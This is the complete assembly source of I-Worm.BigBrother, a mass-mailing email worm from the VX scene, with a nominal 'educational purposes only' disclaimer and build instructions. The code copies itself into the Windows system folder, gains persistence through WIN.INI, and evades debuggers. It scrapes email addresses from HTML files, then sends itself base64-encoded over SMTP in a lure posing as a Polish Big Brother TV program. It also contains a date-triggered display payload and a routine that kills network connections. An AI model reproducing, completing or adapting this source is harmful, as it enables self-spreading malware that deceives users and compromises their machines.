;================================================================================================ ; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ: ; Ä #####################++++++++++++++++++ Ä ; Ä #:I-Worm.BigBrother #¿ ! ¿+ Ä ; Ä ####################*################## Ä ; Ä +¿ ! ¿#:BioCoded by YuP # Ä ; Ä ++++++++++++++++++++################### Ä ; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ: ; ; ; ; ; [Disclaimer] ; ^~^~^~^~^~^~^ ; This file is a demonstration of WINASM coding. Educational purposes only! ; Author is not responsabile of any kind of damages which may occur after the ; asembly of this file. ; I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE. ; ; [2002 CURRENT NOTES] ; This worm is so old that i don't remember when i have coded it, ; it is VERY VERY LAME! IT WAS CODED IN THIS TIMES WHEN I THOUHGT ; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE! ; SO IT IS GOOD FOR LAMMIEZ! ; ; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net ; [current greetz for all guyz from #virus and TKT memberz!] ; ; ; ; ; [Greetz] ; ^~^~^^~^ ; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>. ; * T-2000 / Immortal Riot (4 base encoder sample). ; ; Otherz (pozdrufka) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz, ; tompaw69, PlayerPL, Grabarz (dragon bratha) ; Crash and otherz polish coderz. ; ; Bonus thx to: Dla Karolinki (z BB) -jestes tak glupia ,ze mi cie szkoda. ; (natchnienie) Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma, ; Balon. ; ; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group ; ; [How to Compile] ; ^~^~^~^~^~^~^~^ ; %: tasm32 /m1 /mx big.asm ; %: tlink32 /Tpe /aa big,big,,import32.lib ; %: brc32 big.res ; ; % NOTE. File is also compressed & encrypted by tElock tool ,ver.051 ; ; ; ; [Info] ; ^~^~^~ ; .:[SUPPORT.AVX.COM]: (my commentz in *[]*) ; ; ; ; Details: ;--------- ;Name : I-Worm.BigBrother ;Type: Internet Worm ;Aliases: none ;Size: 12800 bytes ; ;At the time of writing this we have only received one report of infection. ; ; ;Description: ;--------------- ;This is a virus which arrives in your e-mail in the following formatt: ; ;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl ;Subject: BIGBROTHER SHOW ! ; ;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to ;zrobic? Wystarczy ze uruchomisz specjalny program ;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci. ;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie ;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda ;nagrody (telewizory, wieze stereo, ;komputery ...i wiele ,wiele innych). Prosimy przysylac ;opinie i komentarze na temat programu. ; ; ;Zyczymy milej zabawy: ; ;Redakcja programu. ; ;Attachment: BigBrother_Live_Camera.exe ; ;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name: ;b1g_brother.exe ;and adds the following line in WIN.INI: in the section [windows] ; ;run=c:\Windows\System\b1g_brother.exe ; ;After that it checks if the computer is connected to the Internet and then starts sending itself ;through e-mail in the format presented above. ; ;In order to get e-mail addresses it scans all hard drives for html files and it search inside ;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in ;My Documents folder na Temp]* ; ;In case of running the b1g_brother.exe manually it shows the following message: ;SEGMENTATION FAULT. ;Please REPORT this BUG. ; ;Payload: ;----------- ;On May 13 it displays the following message: ;You like to think youÆre never wrong ;You want to act like youÆre someone ;You want someone to hurt like you ;You want to share what youÆve been through ;You live what you learn... ; ;Today you know the truth: i-worm.BigBrother ;Now contact with yourz AV expert. ;Future , Don't trust anyone ... ; [YuP/0ne Earth] ;payyes *[what?]* ;Detection has been added. ; ; ; ; ; [Bugz] ; ^~^~^~ ; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be. ; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out). ; I don't know why ;) i don't have any time to check it with any debugER ;] ; do it yourself if you want of coz. This is my 1st i-worm and its very ; 'low-coded' i think ... The next onez should be better. ; ; ;================================================================================================ ; [L]etz [S]tart ; oO-= Have fun! =-Oo ;================================================================================================ .486p locals jumps .model flat,STDCALL extrn ExitProcess:PROC ;i love it extrn CopyFileA:PROC ;did i miss sth ? extrn MessageBoxA:PROC extrn SetFileAttributesA:PROC extrn GetSystemDirectoryA:PROC extrn lstrcatA:PROC extrn lstrcpyA:PROC extrn CreateFileA:PROC extrn ExitWindowsEx:PROC extrn Sleep:PROC extrn CreateMutexA:PROC extrn GetCurrentProcessId:PROC extrn LoadLibraryA:PROC extrn GetProcAddress:PROC extrn PeekMessageA:PROC extrn OpenMutexA:PROC extrn RegOpenKeyExA:PROC extrn RegQueryValueExA:PROC extrn RegCloseKey:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn CreateFileA:PROC extrn CloseHandle:PROC extrn ReadFile:proc extrn CharNextA:PROC extrn lstrcpyn:PROC extrn lstrlenA:PROC extrn lstrcmp:PROC extrn lstrcpy:PROC extrn FindClose:PROC extrn GetTopWindow:PROC extrn GetNextWindowA:PROC extrn PostMessageA:PROC extrn GetActiveWindow:PROC extrn GetTempPathA:PROC extrn send:PROC extrn recv:PROC extrn WSAStartup:PROC extrn WSACleanup:PROC extrn socket:proc extrn connect:PROC extrn gethostbyname:PROC extrn closesocket:PROC extrn lstrlen:PROC extrn WinExec:PROC extrn lstrcmpi:PROC extrn ReleaseMutex:PROC extrn GetFileSize:PROC extrn WriteFile:PROC extrn GetModuleFileNameA:PROC extrn GetCurrentDirectoryA:PROC extrn _lread:PROC extrn SetCurrentDirectoryA:PROC extrn WriteProfileStringA:PROC extrn RegCreateKeyA:PROC extrn RegOpenKeyA:PROC ;extrnz for payload extrn SetTextColor:PROC extrn GetDC:PROC extrn TextOutA:PROC extrn CreateFontA:PROC extrn SelectObject:PROC extrn LineTo:PROC extrn GetSystemTime:PROC extrn SetBkColor:PROC extrn CreatePen:PROC .DATA signature db "[I-WORM.BigBr0th3r] (c) YuP",0 db "Greetz to all #PHREAKPL CREW",0 db "and #VXERS TERRORIST GROUP.",0 db "Special thx goez to: Dageshi",0 db "& detergent ",0 db "-=* GOOD WORK AV PEOPLE ;P *=-",0 myname db 256 dup(?) new db '\b1g_brother.exe',0 sysD db 256 dup(?) sysDD db 256 dup(?) tempD db 256 dup(?) markerr db 'rundll32 kernel,FatalExit',0 krnl db 'KERNEL32.DLL',0 krnl_proc db 'RegisterServiceProcess',0 mutex_name db 'Kakaroth',0 mutexH dd ? sys_name db 'b1g_brother.exe',0 module_filename db 256 dup(?) dir db 1024 dup(?) bslash db '\',0 ;check connection hang_connection db 'InternetHangUp',0 check_connection db 'InternetGetConnectedState',0 wininet_lib db 'WININET.DLL',0 lpdwFlagz dd 0 ini_key db 'run',0 ini_sect db 'windows',0 ;FOR REGISTRY HKEY_LOCAL_MACHINE equ 80000001h HKEY_CURRENT_USER equ 80000001h hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 hPersonal db 'Personal',0 PersonalF db 128 dup(0) PersonalFsize dd 128 hKeyHandle dd 0 my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0 shit dd 0 shitshit dd 0 server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0 server_h dd 0 server_s db 'SMTP Server',0 server db 128 dup(0) server_size dd 128 ;FOR SEARCH fMASK db '\*.htm*',0 fMASK1 db '*.htm*',0 break db '\',0 oldd dd 128 dup(0) bus db 260 dup(0) ;search buffer ;] fsH dd ? fHnd dd ? sciezka db 260 dup(0) WIN32_FIND_DATA struc dwFileAttributes dd 0 dwLowDateTime0 dd ? ; creation dwHigDateTime0 dd ? dwLowDateTime1 dd ? ; last access dwHigDateTime1 dd ? dwLowDateTime2 dd ? ; last write dwHigDateTime2 dd ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved dd 0,0 cFileName db 260 dup(0) cAlternateFilename db 14 dup(0) db 2 dup(0) WIN32_FIND_DATA ends find_data WIN32_FIND_DATA <?> ;for e-mailz mail db 'mailto:',0 worm_size equ 10000h worm_code db worm_size dup(0) fH dd ? searchH dd ? counter equ 0 longBuff dd ? clear db '',0 myB db 128 dup(?) L1 db '"',0 mail_string db 128 dup(0) mail_good db 128 dup(0) sep db '',0 ;======================[BASE ENCODE DATA]=============================== base_file db '00000b.rat',0 base_file_name db 128 dup(0) base_to_code db '000000s.b64',0 base_to_code_buff db 128 dup(0) Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' DB 'abcdefghijklmnopqrstuvwxyz' DB '0123456789+/' Input_Buffer DB 200 DUP(0) Output_Buffer DB 200 DUP(0) base_buff_size equ 18516 base_buffer DB base_buff_size DUP(0) base_size dd 0 baL dd ? input_handle dd ? Input_Handle dd ? output_handle dd ? Output_Handle dd ? IO_Bytes_Count DD 0 OPEN_EXISTING EQU 00000003h CREATE_ALWAYS EQU 00000002h FILE_ATTRIBUTE_NORMAL EQU 00000080h GENERIC_READ EQU 80000000h GENERIC_WRITE EQU 40000000h ;============[E-MAIL CLIEN7]======================== HELO db 'HELO bigbrother.r0x.pl',0dh,0ah mime_code db 'From: "BIGBROTHER TVN POLSKA" <bigbrother@bigbrother.tvn.com.pl>',0dh,0ah db 'Subject: BIGBROTHER SHOW !',0dh,0ah db 'MIME-Version: 1.0',0dh,0ah db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah db 0dh,0ah,'--a1234',0dh,0ah db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah db 0dh,0ah db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah db 'nagrody (telewizory, wieze stereo,',0dh,0ah db 'komputery ...i wiele ,wiele innych). Prosimy przysylac',0dh,0ah db 'opinie i komentarze na temat programu.',0dh,0ah db 0dh,0ah db 0dh,0ah db 'Zyczymy milej zabawy:',0dh,0ah db 0dh,0ah db 'Redakcja programu.',0dh,0ah db '',0dh,0ah db 0dh,0ah db 0dh,0ah,'--a1234',0dh,0ah db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"' db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah mime_end db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0 mime_e equ mime_end dot db '.',0dh,0ah RCPT_1 db 'RCPT TO:<',0 RCPT_ENDD db '>',0dh,0ah,0 RCPT db 160 dup (?) MAIL_FROM db 'MAIL FROM:<bigbrohter@tvn.pl>',0dh,0ah QUIT db 'QUIT',0dh,0ah _DATA_ db 'DATA',0dh,0ah e_end db '',0 ;==================================[END MAIL DATA]==================================== ;==================================[WIN SOCKZ]======================================== addr struc proto dw 2 port dw 1900h ip db 127,0,0,1 addr ends addr2 addr <> sock dd ? SOCK_STREAM EQU 1 AF_INET EQU 2 WSA_Data DB 400 DUP(0) SOCKET_ERR equ -1 HOSTENT_IP equ 10h rB dd ? ;==================[END WIN SOCKZ]========================================= ;============[END E-MAIL DATA]============================================= ;FOR STEALTH err_title db 'Setup',0 markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah db 'Please REPORT this BUG.',0 db 0dh,0ah,0 ;PAYLOAD ;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* ;===========[PAYL0AD ;))]================================================== dcH dd ? brH dd ? fontH dd ? ;~^~^~^~^~^~^~^^~^~^~^~^ info_line_1 db "You like to think you’re never wrong",0 ;some lyrics from: info_line_2 db "You want to act like you’re someone",0 ;'POINTS OF AUTHORITY' - song info_line_3 db "You want someone to hurt like you",0 ;of my best music group - info_line_4 db "You want to share what you’ve been through",0 ;[L]inkin [P]ark ;)) info_line_5 db "You live what you learn...",0 ;~^~^~^~^~^~^~^~^~^~^~^~^ info_line_6 db "Today you know the truth: i-worm.BigBrother",0 ;some txt from myself info_line_7 db 'Now contact with yourz AV expert.',0 info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0 sysTimeStruct db 16 dup(0) payday db 128 dup(0) payyes db 'payyes',0 ;===========[END PAY DATA]================================================= ;-------------------------------------------------------------------------* ;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* ;-------------------------------------------------------------------------* ;===========[CODE SECTION]================================================= .CODE Kakaroth: push 256 push offset module_filename push 0 call GetModuleFileNameA xor ebp,ebp mov ebp,offset module_filename push offset dir push 256 call GetCurrentDirectoryA push offset bslash push offset dir call lstrcatA push offset dir call lstrlen mov edi,eax sub ecx,edi C_NEXT: push ebp call CharNextA mov ebp,eax dec edi jnz C_NEXT push ecx push ebp push offset myname call lstrcpyn @DEBUG_CODE: lea eax,dword ptr [esp-8h] xor esi,esi xchg eax,dword ptr fs:[esi] lea edi,exception push edi push eax call @antidebug @antidebug: add esp,4 cmp esi,dword ptr fs:[esi+20h] je @SKIP_DEBUG jmp @HEART_STOPS @SKIP_DEBUG: push 0 push 0 push 0 push 0 push 0 call PeekMessageA @COPY_FILE: push 256 push offset sysD call GetSystemDirectoryA xor eax,eax push offset new push offset sysD call lstrcatA cmp eax,0 jc @EXIT push 0 push offset sysD push offset myname call CopyFileA cmp eax,0 jc @EXIT push 01h OR 02h push offset sysD call SetFileAttributesA push offset myname push offset sys_name call lstrcmpi cmp eax,0 jne @RUN_SYS_FILE @_CHECK_4_PAYLOAD: push offset sysTimeStruct call GetSystemTime xor eax,eax lea eax,sysTimeStruct cmp word ptr [eax+2],5 ; 13th May jne @SKIP_PAY cmp word ptr [eax+6],13 jne @SKIP_PAY @PAY: ;payload push 50000 ;sp00ky one ;)) call Sleep ;wait some time push 0h call GetDC mov dword ptr [dcH],eax push 0 push 1000h push 1 call CreatePen mov dword ptr [brH],eax push dword ptr [brH] push dword ptr [dcH] call SelectObject push 500 push 300 push dword ptr [dcH] call LineTo ;=======[FONT]================================================= push 0h push 0h push 0h push 0h push 0h push 0h push 0h push 0h push 0h push 0 push 0 push 13 push 23 call CreateFontA mov dword ptr [fontH],eax push dword ptr [fontH] push dword ptr [dcH] call SelectObject push 0 push dword ptr [dcH] call SetBkColor push 16777215 ;color - white push dword ptr [dcH] call SetTextColor ;======[END FONT]=========================================== @TEXT: push 16777215 push dword ptr [dcH] call SetTextColor mov esi,160 mov edx,offset info_line_1 mov ecx,140 call @TEXT_OUT mov edx,offset info_line_2 mov ecx,170 call @TEXT_OUT mov edx,offset info_line_3 mov ecx,200 call @TEXT_OUT mov edx,offset info_line_4 mov ecx,230 call @TEXT_OUT mov edx,offset info_line_5 mov ecx,260 call @TEXT_OUT mov esi,160 mov edx,offset info_line_6 mov ecx,350 call @TEXT_OUT mov esi,160 mov edx,offset info_line_7 mov ecx,380 call @TEXT_OUT mov esi,160 mov edx,offset info_line_8 mov ecx,435 call @TEXT_OUT push offset payyes push offset payday call lstrcatA call @SKIP_PAY @TEXT_OUT: ;text-out function push edx call lstrlenA push eax push edx push ecx push esi push dword ptr [dcH] call TextOutA ret @SKIP_PAY: @RESIDENT: push offset mutex_name ;am i in memory now ? push 0 push 1 call OpenMutexA cmp eax,0 jne @I_WAS_HERE je @NEXT_ @I_WAS_HERE: push 010h push offset err_title push offset markerror push 0h call MessageBoxA push 0h call ExitProcess @NEXT_: push offset mutex_name ;nop then go there push 1 push 0 call CreateMutexA mov dword ptr [mutexH],eax xor edx,edx xor eax,eax push offset krnl call LoadLibraryA cmp eax,0 jc @EXIT push offset krnl_proc push eax call GetProcAddress or eax,eax jz @PR mov edx,eax call GetCurrentProcessId ;push 1 ;push eax ;call edx @PR: push offset sysD push offset ini_key push offset ini_sect call WriteProfileStringA call @GET_MAILZ_START @GET_MAILZ_START: xor eax,eax push offset hKeyHandle push 0 push 0 push offset hKeyPath push HKEY_LOCAL_MACHINE call RegOpenKeyExA cmp eax,0 jne @EXIT push offset PersonalFsize push offset PersonalF push 0 push 0 push offset hPersonal push hKeyHandle call RegQueryValueExA push offset server_h push 0 push 0 push offset server_p push HKEY_CURRENT_USER call RegOpenKeyExA cmp eax,0 jne @EXIT push offset server_size push offset server push 0 push 0 push offset server_s push server_h call RegQueryValueExA ;PersonalF -> like My Docz push hKeyHandle call RegCloseKey push offset base_file_name push 260 call GetTempPathA push offset base_file push offset base_file_name call lstrcatA ;=======================[BASE ENCODER]========================== ;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) + ; * dageshi (4 everything) + ;=============================================================== @_BASE_ENCODER: push offset base_to_code_buff ;copy source file push 260 call GetTempPathA push offset base_to_code push offset base_to_code_buff call lstrcatA push 1 push offset base_to_code_buff push offset sysD call CopyFileA ;ble ble ble XOR EBX, EBX PUSH EBX PUSH FILE_ATTRIBUTE_NORMAL PUSH OPEN_EXISTING PUSH EBX PUSH EBX PUSH GENERIC_READ PUSH OFFSET base_to_code_buff CALL CreateFileA MOV [Input_Handle], EAX PUSH EBX PUSH FILE_ATTRIBUTE_NORMAL PUSH CREATE_ALWAYS PUSH EBX PUSH EBX PUSH GENERIC_WRITE push OFFSET base_file_name CALL CreateFileA MOV [Output_Handle], EAX PUSH 0 ;wpiszem standard PUSH OFFSET IO_Bytes_Count PUSH (offset mime_end-offset mime_code) push offset mime_code PUSH [Output_Handle] CALL WriteFile cmp eax,0 je @ERROR PUSH EBX ;size PUSH [Input_Handle] CALL GetFileSize CDQ MOV ECX, (76/4)*3 DIV ECX DEC EDX JS No_Round INC EAX No_Round: XCHG ECX, EAX Encode_Line: PUSH ECX MOV ESI, OFFSET Input_Buffer PUSH 0 PUSH OFFSET IO_Bytes_Count PUSH (76/4)*3 PUSH ESI PUSH [Input_Handle] CALL ReadFile MOV EDI, OFFSET Output_Buffer PUSH EDI PUSH 76/4 POP ECX Encode_Packet: PUSH ECX MOV CL, 8 LODSB SHL EAX, CL LODSB SHL EAX, CL LODSB SHL EAX, CL MOV EBX, OFFSET Encoding_Table MOV CL, 4 Encode_Byte: SHR EAX, 2 ROL EAX, 8 XLAT STOSB LOOP Encode_Byte POP ECX LOOP Encode_Packet MOV WORD PTR [EDI], 0A0Dh ; <CRLF>. POP EAX PUSH 0 PUSH OFFSET IO_Bytes_Count PUSH 78 PUSH EAX PUSH [Output_Handle] CALL WriteFile POP ECX LOOP Encode_Line push [Output_Handle] call CloseHandle ;=====================================================[END BASE ENCODER]=========== ;=====================================================[GET BASE CODE TO BUFF]====== @GET_BASE_CODE: push 00000000h push 00000080h push 00000003h push 00000000h push 00000001h push 80000000h push offset base_file_name call CreateFileA mov edi,eax push 0 push edi call GetFileSize push 0 push offset baL push eax push offset base_buffer push edi call ReadFile ;=====================================================[END GETTING]=============== @NEXT__: push offset shitshit push offset my_key push HKEY_LOCAL_MACHINE call RegOpenKeyA cmp eax,0 je @EXIT push offset shit push offset my_key push HKEY_LOCAL_MACHINE call RegCreateKeyA mov bh,0 mov bl,0 CALL @SCAN_MYDOCZ @SCAN_TEMP: push offset tempD push 260 call GetTempPathA push offset clear push offset bus call lstrcpyA push offset tempD push offset bus call lstrcpyA push offset fMASK1 ;add push offset bus call lstrcatA call @FIND_1st call @GO_GO1 @SCAN_MYDOCZ: xor edi,edi push offset clear push offset bus call lstrcpyA push offset PersonalF push offset bus call lstrcpyA push offset fMASK ;add push offset bus call lstrcatA call @FIND_1st call @GO_GO @FIND_1st: push offset find_data push offset bus call FindFirstFileA mov dword ptr [searchH],eax cmp eax,-1 je @ERROR ret @CLEAR_PATH: push offset clear push offset sciezka call lstrcpyA ret @GO_GO: call @CLEAR_PATH xor edi,edi push offset PersonalF push offset sciezka call lstrcatA push offset break push offset sciezka call lstrcatA push offset find_data.cFileName push offset sciezka call lstrcatA xor edi,edi mov edi,offset sciezka call @SCAN_HTM_FILE_STEP1 @GO_GO1: call @CLEAR_PATH xor edi,edi push offset tempD push offset sciezka call lstrcatA push offset break push offset sciezka call lstrcatA push offset find_data.cFileName push offset sciezka call lstrcatA xor edi,edi mov edi,offset sciezka call @SCAN_HTM_FILE_STEP1 @SCAN_HTM_FILE_STEP1: push 00000000h push 00000080h push 00000003h push 00000000h push 00000001h push 80000000h push edi call CreateFileA cmp eax,-1 je @ERROR_M mov dword ptr [fH],eax push 0h push offset longBuff push worm_size ;size push offset worm_code push dword ptr [fH] call ReadFile cmp eax,0 je @ERROR_M call @CLEAR @MARK: xor esi,esi mov esi,0 xor ebp,ebp mov ebp,offset worm_code xor edi,edi mov edi,1 @ALGORITM: xor edi,edi mov edi,1 call LOOPING_JOE push offset L1 push offset myB call lstrcmp cmp eax,0 je @CH inc esi cmp esi,10000 ja @END_OF_FILE call @ALGORITM @CH: call @CLEAR call @CHECK_STRING LOOPING_JOE: push ebp call CharNextA mov ebp,eax push 2 push ebp push offset myB call lstrcpyn ret @CHECK_STRING: call LOOPING_JOE push offset myB push offset mail_string call lstrcatA inc esi inc edi cmp edi,8 jne @CHECK_STRING je @IS_IT_GOD @IS_IT_GOD: push offset mail push offset mail_string call lstrcmp cmp eax,0 je @GET_MAIL jne @ALGORITM @GET_MAIL: call LOOPING_JOE push offset L1 push offset myB call lstrcmp cmp eax,0 je @END_MAIL push offset myB push offset mail_good call lstrcatA inc esi cmp esi,1000 jne @GET_MAIL @END_MAIL: ;TU GEN MAIL inc bl cmp bl,10 ja @ERROR call @SEND_MAIL @NEXT_MAILL: xor edi,edi mov edi,1 call @ALGORITM @END_OF_FILE: push dword ptr [fH] call CloseHandle xor eax,eax xor ebp,ebp call @CLEAR call @CLEAR_BUFF call @FIND_NEXT_FILE @CLEAR: push offset sep push offset mail_good call lstrcpy push offset sep push offset mail_string call lstrcpy ret @CLEAR_BUFF: push offset sep push offset worm_code call lstrcpy ret exception: xor esi,esi mov eax,dword ptr fs:[esi] mov esp,dword ptr [eax] @FIND_NEXT_FILE: push offset find_data push dword ptr [searchH] call FindNextFileA cmp eax,0 je @ERROR_NO_FILEZ_LEFT cmp bh,1 ja @GO_TO_GO1 call @GO_GO @GO_TO_GO1: call @GO_GO1 @ERROR: push dword ptr [fHnd] call CloseHandle call @EXIT @ERROR_M: push dword ptr [searchH] call FindClose call @EXIT @ERROR_NO_FILEZ_LEFT: cmp bh,2 je @ERROR_M ja @ERROR_M add bh,2 push dword ptr [searchH] call FindClose call @SCAN_TEMP @SEND_MAIL: push offset RCPT_1 push offset RCPT call lstrcatA push offset mail_good push offset RCPT call lstrcatA push offset RCPT_ENDD push offset RCPT call lstrcatA ;======[CHECK INTERNET STATE]======= ;WININET.DLL REQUIRED :> + ;=================================== @CHECK_CONN: push 500 ;little stealth call Sleep push offset wininet_lib call LoadLibraryA push offset check_connection push eax call GetProcAddress xchg eax,ecx jecxz @INIT_W ;push 0 ;push offset lpdwFlagz ;call ecx ;or eax,eax ;jz @CHECK_CONN ;======[INIT WINSOCK]================ @INIT_W: push offset WSA_Data PUSH 0101h CALL WSAStartup cmp eax,0 jne @EXIT push 0 push SOCK_STREAM push AF_INET call socket cmp eax,SOCKET_ERR je @CLEAN mov sock,eax ;======[CONNECT]===================== ;push offset server ;call gethostbyname ;cmp eax,0 ;je @CLEAN ;mov eax,dword ptr [eax+HOSTENT_IP] ;mov eax,dword ptr [eax] ;mov dword ptr [addr2.ip],eax push 16 push offset addr2 push sock call connect cmp ax,SOCKET_ERR je @CLEAN ;======[READ AND SEND LOOP]========== push 20 call Sleep push 0 push 512 push offset rB push sock call recv push 0 push 24 push offset HELO push sock call send push 20 call Sleep push 0 push 512 push offset rB push sock call recv push 0 push 31 push offset MAIL_FROM push sock call send push 20 call Sleep push 0 push 512 push offset rB push sock call recv push offset RCPT call lstrlen push 0 push eax push offset RCPT push sock call send push 20 call Sleep push 0 push 512 push offset rB push sock call recv push 0 push 6 push offset _DATA_ push sock call send push 20 call Sleep push 0 push 512 push offset rB push sock call recv push offset base_buffer call lstrlen push 0 push eax push offset base_buffer push sock call send push 0 push 3 push offset dot push sock call send push 20 call Sleep push 0 push 512 push offset rB push sock call recv push 0 push 6 push offset QUIT push sock call send push sock call closesocket call WSACleanup push offset sep push offset RCPT call lstrcpy push 5000 call Sleep call @NEXT_MAILL @EX: push sock call closesocket push 0h call ExitProcess @CLEAN: call WSACleanup push 0h call @EXIT @EXIT: push offset payday push offset payyes call lstrcmp cmp eax,0 je @HANG_ALL_CONNECTIoNZ jne _STAY_IN_MEM _STAY_IN_MEM: push 50000 call Sleep call _STAY_IN_MEM @BUFFER_OVERFLOW: call GetActiveWindow ;zabijamy aktywne okno przypuszczalnie debugger mov edx,eax ;nieskonczona petla powoduje blad w kernelu push 0 ;plik robaka bedzie dostepny po resecie systemu ;)) push 0 push 12h push edx call PostMessageA CALL @BUFFER_OVERFLOW @HEART_STOPS: push 1 push offset markerr call WinExec push 100 call Sleep call @BUFFER_OVERFLOW @RUN_SYS_FILE: push 256 push offset sysDD call GetSystemDirectoryA push offset sysDD call SetCurrentDirectoryA push 500 call Sleep push 1 push offset sysD call WinExec push dword ptr [mutexH] call ReleaseMutex push 0h call ExitProcess @HANG_ALL_CONNECTIoNZ: push 500 ;timer call Sleep push offset wininet_lib call LoadLibraryA push offset hang_connection push eax call GetProcAddress xchg eax,ecx push 0h ;kiss me goodbye ;) push offset lpdwFlagz ;I don`t know that this WININET call ecx ;function is working ;) Refer call @HANG_ALL_CONNECTIoNZ ;to Jacob Navia it should be. ;[*Nice 'WININET' Ref ;) Big Thx :*] End Kakaroth ;================================================================================================ ; +1679 linez of asm c0de ;)) ? I did it ? he he ... ; ;================================================================================================ ;***** This is the end of your jurney... Sorry about commentz...i know - my english skillz. ***** ;================================================================================================ ; eEEEEEe nNn Nn dDDDd #+ ; EE NNnN nN Dd dD #+ ; EEEe nN nN nN dD dD #+ ; EE NN nN nN Dd dD #+ ; eEEEEEe nN nNNn dDDDd #+ ; #+ ; -= .: CoDinG is No7 a CrIm3 :. =- #+ ;================================================================================================